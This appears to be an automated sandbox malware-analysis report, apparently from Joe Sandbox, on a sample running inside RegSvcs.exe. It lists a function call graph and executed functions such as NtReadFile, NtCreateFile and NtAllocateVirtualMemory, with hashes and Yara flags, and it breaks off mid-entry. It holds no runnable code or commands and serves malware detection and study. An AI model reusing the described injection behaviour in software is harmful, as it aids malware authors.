409ca3 44894 418a70 44893->44894 44921 41a600 44894->44921 44898 41b2c9 44897->44898 44928 414a50 44898->44928 44900 41b2e1 44901 41b2ea 44900->44901 44967 41b0f0 44900->44967 44901->44866 44903 41b2fe 44903->44901 44985 419f00 44903->44985 44911 409aca 44908->44911 45243 407ea0 44908->45243 44910 409ad1 44910->44868 44911->44910 45256 408160 44911->45256 44914->44870 44916 414e6a 44915->44916 44917 414e5e 44915->44917 44916->44893 44917->44916 44920 4152d0 LdrLoadDll 44917->44920 44919 414fbc 44919->44893 44920->44919 44924 41af60 44921->44924 44923 418a85 44923->44864 44925 41af70 44924->44925 44927 41af92 44924->44927 44926 414e50 LdrLoadDll 44925->44926 44926->44927 44927->44923 44929 414d85 44928->44929 44939 414a64 44928->44939 44929->44900 44932 414b90 44996 41a360 44932->44996 44933 414b73 45053 41a460 LdrLoadDll 44933->45053 44936 414bb7 44938 41bdc0 2 API calls 44936->44938 44937 414b7d 44937->44900 44941 414bc3 44938->44941 44939->44929 44993 419c50 44939->44993 44940 414d49 44943 41a490 2 API calls 44940->44943 44941->44937 44941->44940 44942 414d5f 44941->44942 44947 414c52 44941->44947 45062 414790 LdrLoadDll NtReadFile NtClose 44942->45062 44944 414d50 44943->44944 44944->44900 44946 414d72 44946->44900 44948 414cb9 44947->44948 44950 414c61 44947->44950 44948->44940 44949 414ccc 44948->44949 45055 41a2e0 44949->45055 44952 414c66 44950->44952 44953 414c7a 44950->44953 45054 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 44952->45054 44956 414c97 44953->44956 44957 414c7f 44953->44957 44956->44944 45011 414410 44956->45011 44999 4146f0 44957->44999 44959 414c70 44959->44900 44961 414c8d 44961->44900 44963 414d2c 45059 41a490 44963->45059 44964 414caf 44964->44900 44966 414d38 44966->44900 44968 41b101 44967->44968 44969 41b113 44968->44969 45080 41bd40 44968->45080 44969->44903 44971 41b134 44974 41b157 44971->44974 45083 414070 44971->45083 44973 41b180 44973->44903 44974->44973 44975 414070 3 API calls 44974->44975 44977 41b179 44975->44977 44977->44973 45115 415390 44977->45115 44978 41b20a 44979 41b21a 44978->44979 45209 41af00 LdrLoadDll 44978->45209 45125 41ad70 44979->45125 44982 41b248 45204 419ec0 44982->45204 44986 41af60 LdrLoadDll 44985->44986 44987 419f1c 44986->44987 45237 14f2c0a 44987->45237 44988 419f37 44990 41bdc0 44988->44990 45240 41a670 44990->45240 44992 41b359 44992->44866 44994 41af60 LdrLoadDll 44993->44994 44995 414b44 44994->44995 44995->44932 44995->44933 44995->44937 44997 41a37c NtCreateFile 44996->44997 44998 41af60 LdrLoadDll 44996->44998 44997->44936 44998->44997 45000 41470c 44999->45000 45001 41a2e0 LdrLoadDll 45000->45001 45002 41472d 45001->45002 45003 414734 45002->45003 45004 414748 45002->45004 45006 41a490 2 API calls 45003->45006 45005 41a490 2 API calls 45004->45005 45008 414751 45005->45008 45007 41473d 45006->45007 45007->44961 45063 41bfd0 LdrLoadDll RtlAllocateHeap 45008->45063 45010 41475c 45010->44961 45012 41445b 45011->45012 45013 41448e 45011->45013 45014 41a2e0 LdrLoadDll 45012->45014 45015 4145d9 45013->45015 45019 4144aa 45013->45019 45016 414476 45014->45016 45017 41a2e0 LdrLoadDll 45015->45017 45018 41a490 2 API calls 45016->45018 45023 4145f4 45017->45023 45020 41447f 45018->45020 45021 41a2e0 LdrLoadDll 45019->45021 45020->44964 45022 4144c5 45021->45022 45025 4144e1 45022->45025 45026 4144cc 45022->45026 45076 41a320 LdrLoadDll 45023->45076 45027 4144e6 45025->45027 45028 4144fc 45025->45028 45030 41a490 2 API calls 45026->45030 45032 41a490 2 API calls 45027->45032 45037 414501 45028->45037 45064 41bf90 45028->45064 45029 41462e 45033 41a490 2 API calls 45029->45033 45031 4144d5 45030->45031 45031->44964 45035 4144ef 45032->45035 45034 414639 45033->45034 45034->44964 45035->44964 45041 414513 45037->45041 45067 41a410 45037->45067 45039 414567 45040 41457e 45039->45040 45075 41a2a0 LdrLoadDll 45039->45075 45043 414585 45040->45043 45044 41459a 45040->45044 45041->44964 45045 41a490 2 API calls 45043->45045 45046 41a490 2 API calls 45044->45046 45045->45041 45047 4145a3 45046->45047 45048 4145cf 45047->45048 45070 41bb90 45047->45070 45048->44964 45050 4145ba 45051 41bdc0 2 API calls 45050->45051 45052 4145c3 45051->45052 45052->44964 45053->44937 45054->44959 45056 41af60 LdrLoadDll 45055->45056 45057 414d14 45056->45057 45058 41a320 LdrLoadDll 45057->45058 45058->44963 45060 41af60 LdrLoadDll 45059->45060 45061 41a4ac NtClose 45060->45061 45061->44966 45062->44946 45063->45010 45077 41a630 45064->45077 45066 41bfa8 45066->45037 45068 41af60 LdrLoadDll 45067->45068 45069 41a42c NtReadFile 45068->45069 45069->45039 45071 41bbb4 45070->45071 45072 41bb9d 45070->45072 45071->45050 45072->45071 45073 41bf90 2 API calls 45072->45073 45074 41bbcb 45073->45074 45074->45050 45075->45040 45076->45029 45078 41af60 LdrLoadDll 45077->45078 45079 41a64c RtlAllocateHeap 45078->45079 45079->45066 45210 41a540 45080->45210 45082 41bd6d 45082->44971 45084 414081 45083->45084 45086 414089 45083->45086 45084->44974 45085 41435c 45085->44974 45086->45085 45213 41cf30 45086->45213 45088 4140dd 45089 41cf30 2 API calls 45088->45089 45092 4140e8 45089->45092 45090 414136 45093 41cf30 2 API calls 45090->45093 45092->45090 45094 41d060 3 API calls 45092->45094 45224 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 45092->45224 45096 41414a 45093->45096 45094->45092 45095 4141a7 45097 41cf30 2 API calls 45095->45097 45096->45095 45218 41d060 45096->45218 45098 4141bd 45097->45098 45100 4141fa 45098->45100 45102 41d060 3 API calls 45098->45102 45101 41cf30 2 API calls 45100->45101 45103 414205 45101->45103 45102->45098 45104 41d060 3 API calls 45103->45104 45110 41423f 45103->45110 45104->45103 45106 414334 45226 41cf90 LdrLoadDll RtlFreeHeap 45106->45226 45108 41433e 45227 41cf90 LdrLoadDll RtlFreeHeap 45108->45227 45225 41cf90 LdrLoadDll RtlFreeHeap 45110->45225 45111 414348 45228 41cf90 LdrLoadDll RtlFreeHeap 45111->45228 45113 414352 45229 41cf90 LdrLoadDll RtlFreeHeap 45113->45229 45116 4153a1 45115->45116 45117 414a50 8 API calls 45116->45117 45118 4153b7 45117->45118 45119 4153f2 45118->45119 45120 415405 45118->45120 45124 41540a 45118->45124 45121 41bdc0 2 API calls 45119->45121 45122 41bdc0 2 API calls 45120->45122 45123 4153f7 45121->45123 45122->45124 45123->44978 45124->44978 45126 41ad84 45125->45126 45127 41ac30 LdrLoadDll 45125->45127 45230 41ac30 45126->45230 45127->45126 45130 41ac30 LdrLoadDll 45131 41ad96 45130->45131 45132 41ac30 LdrLoadDll 45131->45132 45133 41ad9f 45132->45133 45134 41ac30 LdrLoadDll 45133->45134 45135 41ada8 45134->45135 45136 41ac30 LdrLoadDll 45135->45136 45137 41adb1 45136->45137 45138 41ac30 LdrLoadDll 45137->45138 45139 41adbd 45138->45139 45140 41ac30 LdrLoadDll 45139->45140 45141 41adc6 45140->45141 45142 41ac30 LdrLoadDll 45141->45142 45143 41adcf 45142->45143 45144 41ac30 LdrLoadDll 45143->45144 45145 41add8 45144->45145 45146 41ac30 LdrLoadDll 45145->45146 45147 41ade1 45146->45147 45148 41ac30 LdrLoadDll 45147->45148 45149 41adea 45148->45149 45150 41ac30 LdrLoadDll 45149->45150 45151 41adf6 45150->45151 45152 41ac30 LdrLoadDll 45151->45152 45153 41adff 45152->45153 45154 41ac30 LdrLoadDll 45153->45154 45155 41ae08 45154->45155 45156 41ac30 LdrLoadDll 45155->45156 45157 41ae11 45156->45157 45158 41ac30 LdrLoadDll 45157->45158 45159 41ae1a 45158->45159 45160 41ac30 LdrLoadDll 45159->45160 45161 41ae23 45160->45161 45162 41ac30 LdrLoadDll 45161->45162 45163 41ae2f 45162->45163 45164 41ac30 LdrLoadDll 45163->45164 45165 41ae38 45164->45165 45166 41ac30 LdrLoadDll 45165->45166 45167 41ae41 45166->45167 45168 41ac30 LdrLoadDll 45167->45168 45169 41ae4a 45168->45169 45170 41ac30 LdrLoadDll 45169->45170 45171 41ae53 45170->45171 45172 41ac30 LdrLoadDll 45171->45172 45173 41ae5c 45172->45173 45174 41ac30 LdrLoadDll 45173->45174 45175 41ae68 45174->45175 45176 41ac30 LdrLoadDll 45175->45176 45177 41ae71 45176->45177 45178 41ac30 LdrLoadDll 45177->45178 45179 41ae7a 45178->45179 45180 41ac30 LdrLoadDll 45179->45180 45181 41ae83 45180->45181 45182 41ac30 LdrLoadDll 45181->45182 45183 41ae8c 45182->45183 45184 41ac30 LdrLoadDll 45183->45184 45185 41ae95 45184->45185 45186 41ac30 LdrLoadDll 45185->45186 45187 41aea1 45186->45187 45188 41ac30 LdrLoadDll 45187->45188 45189 41aeaa 45188->45189 45190 41ac30 LdrLoadDll 45189->45190 45191 41aeb3 45190->45191 45192 41ac30 LdrLoadDll 45191->45192 45193 41aebc 45192->45193 45194 41ac30 LdrLoadDll 45193->45194 45195 41aec5 45194->45195 45196 41ac30 LdrLoadDll 45195->45196 45197 41aece 45196->45197 45198 41ac30 LdrLoadDll 45197->45198 45199 41aeda 45198->45199 45200 41ac30 LdrLoadDll 45199->45200 45201 41aee3 45200->45201 45202 41ac30 LdrLoadDll 45201->45202 45203 41aeec 45202->45203 45203->44982 45205 41af60 LdrLoadDll 45204->45205 45206 419edc 45205->45206 45236 14f2df0 LdrInitializeThunk 45206->45236 45207 419ef3 45207->44903 45209->44979 45211 41af60 LdrLoadDll 45210->45211 45212 41a55c NtAllocateVirtualMemory 45211->45212 45212->45082 45214 41cf40 45213->45214 45215 41cf46 45213->45215 45214->45088 45216 41bf90 2 API calls 45215->45216 45217 41cf6c 45216->45217 45217->45088 45219 41cfd0 45218->45219 45220 41d02d 45219->45220 45221 41bf90 2 API calls 45219->45221 45220->45096 45222 41d00a 45221->45222 45223 41bdc0 2 API calls 45222->45223 45223->45220 45224->45092 45225->45106 45226->45108 45227->45111 45228->45113 45229->45085 45231 41ac4b 45230->45231 45232 414e50 LdrLoadDll 45231->45232 45233 41ac6b 45232->45233 45234 414e50 LdrLoadDll 45233->45234 45235 41ad17 45233->45235 45234->45235 45235->45130 45236->45207 45238 14f2c1f LdrInitializeThunk 45237->45238 45239 14f2c11 45237->45239 45238->44988 45239->44988 45241 41af60 LdrLoadDll 45240->45241 45242 41a68c RtlFreeHeap 45241->45242 45242->44992 45244 407eb0 45243->45244 45245 407eab 45243->45245 45246 41bd40 2 API calls 45244->45246 45245->44911 45253 407ed5 45246->45253 45247 407f38 45247->44911 45248 419ec0 2 API calls 45248->45253 45249 407f3e 45250 407f64 45249->45250 45252 41a5c0 2 API calls 45249->45252 45250->44911 45254 407f55 45252->45254 45253->45247 45253->45248 45253->45249 45255 41bd40 2 API calls 45253->45255 45259 41a5c0 45253->45259 45254->44911 45255->45253 45257 41a5c0 2 API calls 45256->45257 45258 40817e 45257->45258 45258->44868 45260 41af60 LdrLoadDll 45259->45260 45261 41a5dc 45260->45261 45264 14f2c70 LdrInitializeThunk 45261->45264 45262 41a5f3 45262->45253 45264->45262 45266 41b5c3 45265->45266 45269 40acf0 45266->45269 45270 40ad14 45269->45270 45271 40ad50 LdrLoadDll 45270->45271 45272 409c5b 45270->45272 45271->45272 45272->44876 45275 40b063 45273->45275 45274 40b0e0 45274->44881 45275->45274 45288 419c90 LdrLoadDll 45275->45288 45278 41af60 LdrLoadDll 45277->45278 45279 40f1bb 45278->45279 45279->44884 45280 41a7d0 45279->45280 45281 41af60 LdrLoadDll 45280->45281 45282 41a7ef LookupPrivilegeValueW 45281->45282 45282->44886 45284 41af60 LdrLoadDll 45283->45284 45285 41a27c 45284->45285 45289 14f2ea0 LdrInitializeThunk 45285->45289 45286 41a29b 45286->44887 45288->45274 45289->45286 45291 40b1f0 45290->45291 45292 40b040 LdrLoadDll 45291->45292 45293 40b204 45292->45293 45293->44823 45295 40ae51 45294->45295 45296 40ae4d 45294->45296 45297 40ae9c 45295->45297 45299 40ae6a 45295->45299 45296->44826 45340 419cd0 LdrLoadDll 45297->45340 45339 419cd0 LdrLoadDll 45299->45339 45300 40aead 45300->44826 45302 40ae8c 45302->44826 45304 40f4a0 3 API calls 45303->45304 45305 4143c6 45303->45305 45304->45305 45305->44828 45341 4087a0 45306->45341 45309 4087a0 18 API calls 45310 408a8a 45309->45310 45312 408a9d 45310->45312 45359 40f710 9 API calls 45310->45359 45312->44830 45314 41af60 LdrLoadDll 45313->45314 45315 40c322 45314->45315 45316 40f4a0 45315->45316 45317 40f4bd 45316->45317 45478 419fc0 45317->45478 45320 40f505 45320->44834 45321 41a010 2 API calls 45322 40f52e 45321->45322 45322->44834 45324 41af60 LdrLoadDll 45323->45324 45325 41a02c 45324->45325 45484 14f2d10 LdrInitializeThunk 45325->45484 45326 40c385 45326->44840 45326->44843 45329 41af60 LdrLoadDll 45328->45329 45330 41a07c 45329->45330 45485 14f2d30 LdrInitializeThunk 45330->45485 45331 40c459 45331->44851 45334 419e35 45333->45334 45335 41af60 LdrLoadDll 45334->45335 45336 419e3c 45335->45336 45486 14f2fb0 LdrInitializeThunk 45336->45486 45337 40c4ac 45337->44855 45339->45302 45340->45300 45342 407ea0 4 API calls 45341->45342 45349 4087ba 45342->45349 45343 408a49 45343->45309 45343->45312 45344 408a3f 45345 408160 2 API calls 45344->45345 45345->45343 45348 419f00 2 API calls 45348->45349 45349->45343 45349->45344 45349->45348 45353 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 45349->45353 45356 419e20 2 API calls 45349->45356 45357 41a490 LdrLoadDll NtClose 45349->45357 45360 419d10 45349->45360 45363 4085d0 45349->45363 45375 40f5f0 LdrLoadDll NtClose 45349->45375 45376 419d90 LdrLoadDll 45349->45376 45377 419dc0 LdrLoadDll 45349->45377 45378 419e50 LdrLoadDll 45349->45378 45379 4083a0 45349->45379 45395 405f60 LdrLoadDll 45349->45395 45353->45349 45356->45349 45357->45349 45359->45312 45361 419d2c 45360->45361 45362 41af60 LdrLoadDll 45360->45362 45361->45349 45362->45361 45364 4085e6 45363->45364 45396 419880 45364->45396 45366 4085ff 45371 408771 45366->45371 45417 4081a0 45366->45417 45368 4086e5 45369 4083a0 10 API calls 45368->45369 45368->45371 45370 408713 45369->45370 45370->45371 45372 419f00 2 API calls 45370->45372 45371->45349 45373 408748 45372->45373 45373->45371 45374 41a500 LdrLoadDll 45373->45374 45374->45371 45375->45349 45376->45349 45377->45349 45378->45349 45380 4083c9 45379->45380 45457 408310 45380->45457 45383 41a500 LdrLoadDll 45384 4083dc 45383->45384 45384->45383 45385 408467 45384->45385 45388 408462 45384->45388 45465 40f670 45384->45465 45385->45349 45386 41a490 2 API calls 45387 40849a 45386->45387 45387->45385 45389 419d10 LdrLoadDll 45387->45389 45388->45386 45390 4084ff 45389->45390 45390->45385 45469 419d50 45390->45469 45392 408563 45392->45385 45393 414a50 8 API calls 45392->45393 45394 4085b8 45393->45394 45394->45349 45395->45349 45397 41bf90 2 API calls 45396->45397 45398 419897 45397->45398 45424 409310 45398->45424 45400 4198b2 45401 4198f0 45400->45401 45402 4198d9 45400->45402 45405 41bd40 2 API calls 45401->45405 45403 41bdc0 2 API calls 45402->45403 45404 4198e6 45403->45404 45404->45366 45406 41992a 45405->45406 45407 41bd40 2 API calls 45406->45407 45408 419943 45407->45408 45414 419be4 45408->45414 45430 41bd80 45408->45430 45411 419bd0 45412 41bdc0 2 API calls 45411->45412 45413 419bda 45412->45413 45413->45366 45415 41bdc0 2 API calls 45414->45415 45416 419c39 45415->45416 45416->45366 45418 4081b5 45417->45418 45419 40829f 45417->45419 45418->45419 45420 414a50 8 API calls 45418->45420 45419->45368 45421 408222 45420->45421 45422 41bdc0 2 API calls 45421->45422 45423 408249 45421->45423 45422->45423 45423->45368 45425 409335 45424->45425 45426 40acf0 LdrLoadDll 45425->45426 45427 409368 45426->45427 45429 40938d 45427->45429 45433 40cf20 45427->45433 45429->45400 45451 41a580 45430->45451 45434 40cf2c 45433->45434 45435 41a1e0 LdrLoadDll 45434->45435 45436 40cf65 45435->45436 45437 40cf6c 45436->45437 45444 41a220 45436->45444 45437->45429 45441 40cfa7 45442 41a490 2 API calls 45441->45442 45443 40cfca 45442->45443 45443->45429 45445 41a23c 45444->45445 45446 41af60 LdrLoadDll 45444->45446 45450 14f2ca0 LdrInitializeThunk 45445->45450 45446->45445 45447 40cf8f 45447->45437 45449 41a810 LdrLoadDll 45447->45449 45449->45441 45450->45447 45452 41af60 LdrLoadDll 45451->45452 45453 41a59c 45452->45453 45456 14f2f90 LdrInitializeThunk 45453->45456 45454 419bc9 45454->45411 45454->45414 45456->45454 45458 408328 45457->45458 45459 40acf0 LdrLoadDll 45458->45459 45460 408343 45459->45460 45461 414e50 LdrLoadDll 45460->45461 45462 408353 45461->45462 45463 40835c PostThreadMessageW 45462->45463 45464 408370 45462->45464 45463->45464 45464->45384 45466 40f683 45465->45466 45472 419e90 45466->45472 45470 41af60 LdrLoadDll 45469->45470 45471 419d6c 45470->45471 45471->45392 45473 41af60 LdrLoadDll 45472->45473 45474 419eac 45473->45474 45477 14f2dd0 LdrInitializeThunk 45474->45477 45475 40f6ae 45475->45384 45477->45475 45479 41af60 LdrLoadDll 45478->45479 45480 419fdc 45479->45480 45483 14f2f30 LdrInitializeThunk 45480->45483 45481 40f4fe 45481->45320 45481->45321 45483->45481 45484->45326 45485->45331 45486->45337 45487 14f0030 45488 14f006b 45487->45488 45489 14f009b 45488->45489 45490 14f010a 45488->45490 45494 14f0185 45489->45494 45493 14f00aa 45490->45493 45512 14ed963 79 API calls 45490->45512 45495 14f03e9 __startOneArgErrorHandling 45494->45495 45496 14f01bd 45494->45496 45495->45493 45496->45495 45513 14f1b80 72 API calls 45496->45513 45498 14f029f 45498->45495 45499 14f02bd GetPEB 45498->45499 45500 14f02c6 45498->45500 45499->45500 45514 14f1843 76 API calls 45500->45514 45502 14f02dc 45515 14f2df0 LdrInitializeThunk 45502->45515 45504 14f02f8 45505 14f034a 45504->45505 45516 14f096e 45504->45516 45541 14f0735 71 API calls 45505->45541 45508 14f0378 45509 14f03b6 45508->45509 45542 14f05b0 LdrInitializeThunk 45508->45542 45543 14f0424 74 API calls __startOneArgErrorHandling 45509->45543 45512->45493 45513->45498 45514->45502 45515->45504 45517 14f09a8 45516->45517 45544 14f2df0 LdrInitializeThunk 45517->45544 45519 14f0ed3 __startOneArgErrorHandling 45519->45505 45520 14f0a15 45520->45519 45545 14f2df0 LdrInitializeThunk 45520->45545 45522 14f0a6c 45522->45519 45546 14f0f04 LdrInitializeThunk __startOneArgErrorHandling 45522->45546 45524 14f0a81 45524->45519 45525 14f0a8b GetPEB 45524->45525 45547 14c5e70 71 API calls 45525->45547 45527 14f0ac5 45548 14f171c 45527->45548 45529 14f0e0f 45530 14f0ec2 GetPEB 45529->45530 45559 14f2b60 LdrInitializeThunk 45529->45559 45530->45519 45532 14f0f02 45532->45530 45533 14f0ae9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 45533->45529 45534 14f0bbb GetPEB 45533->45534 45535 14f0cb9 45534->45535 45556 14f13c5 73 API calls __startOneArgErrorHandling 45535->45556 45538 14f0ce6 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 45540 14f0ddb 45538->45540 45557 14f10ee 77 API calls __startOneArgErrorHandling 45538->45557 45558 14f0fa6 73 API calls 45540->45558 45541->45508 45542->45509 45543->45495 45544->45520 45545->45522 45546->45524 45547->45527 45549 14f175b 45548->45549 45560 14d1d28 73 API calls 45549->45560 45551 14f1797 45555 14f17e5 45551->45555 45561 14f2fe0 LdrInitializeThunk 45551->45561 45554 14f1830 __startOneArgErrorHandling 45554->45533 45562 14c3c70 GetPEB 45555->45562 45556->45538 45557->45540 45558->45529 45559->45532 45560->45551 45561->45555 45562->45554 45563 14f2bf0 LdrInitializeThunk 45564 14f2380 45565 14f23b7 45564->45565 45566 14f2469 45565->45566 45579 14ede1e 71 API calls 45565->45579 45580 14ee284 GetPEB 45565->45580 45589 14ede1e 71 API calls 45566->45589 45568 14f2471 45569 14ee284 76 API calls 45568->45569 45570 14f247a 45569->45570 45590 14f2b60 LdrInitializeThunk 45570->45590 45573 14f2484 45591 14ee443 8 API calls 45573->45591 45576 14f24a4 45592 14eb570 141 API calls 45576->45592 45579->45565 45593 14c5e70 71 API calls 45580->45593 45582 14ee2e1 45594 14f2ad0 LdrInitializeThunk 45582->45594 45584 14ee3de GetPEB 45585 14ee3f0 __startOneArgErrorHandling 45584->45585 45585->45565 45586 14ee308 45586->45584 45595 14f0fa6 73 API calls 45586->45595 45588 14ee3a9 45588->45584 45589->45568 45590->45573 45591->45576 45593->45582 45594->45586 45595->45588

                                                                                            Executed Functions

                                                                                            Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 41a410-41a459 call 41af60 NtReadFile
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID: 1JA$rMA$rMA
                                                                                            • API String ID: 2738559852-782607585
                                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 246 41a35a-41a3b1 call 41af60 NtCreateFile
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 519356f8128ead4ab6967f9f834b5cc5c27a6b5187eb98d1fc20d80f3b898423
                                                                                            • Instruction ID: db9765c572d52390fb8604434ff9c67f718cda35ab6f8ca037d898e886166646
                                                                                            • Opcode Fuzzy Hash: 519356f8128ead4ab6967f9f834b5cc5c27a6b5187eb98d1fc20d80f3b898423
                                                                                            • Instruction Fuzzy Hash: 3601B2B2605218AFCB18CF89DC85EEB77ADEF8C754F158248FA0D97241C630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 249 41a360-41a376 250 41a37c-41a3b1 NtCreateFile 249->250 251 41a377 call 41af60 249->251 251->250
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041A53B Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 252 41a53b-41a556 253 41a55c-41a57d NtAllocateVirtualMemory 252->253 254 41a557 call 41af60 252->254 254->253
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: b519c5b3bf3ed23989de45a446a3f1483a0321d4813e08a8efb2a01f839b3b1f
                                                                                            • Instruction ID: 2d8d7cd051b59848394cec9ab28889dd1b47d2bdb116ea822d79e9dc0c770f2c
                                                                                            • Opcode Fuzzy Hash: b519c5b3bf3ed23989de45a446a3f1483a0321d4813e08a8efb2a01f839b3b1f
                                                                                            • Instruction Fuzzy Hash: C8F0F8B5200108ABDB14DF99CC81EEB77A9EF8C354F158249BA0997241C634E921CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 255 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 264 41a490-41a4b9 call 41af60 NtClose
                                                                                            APIs
                                                                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
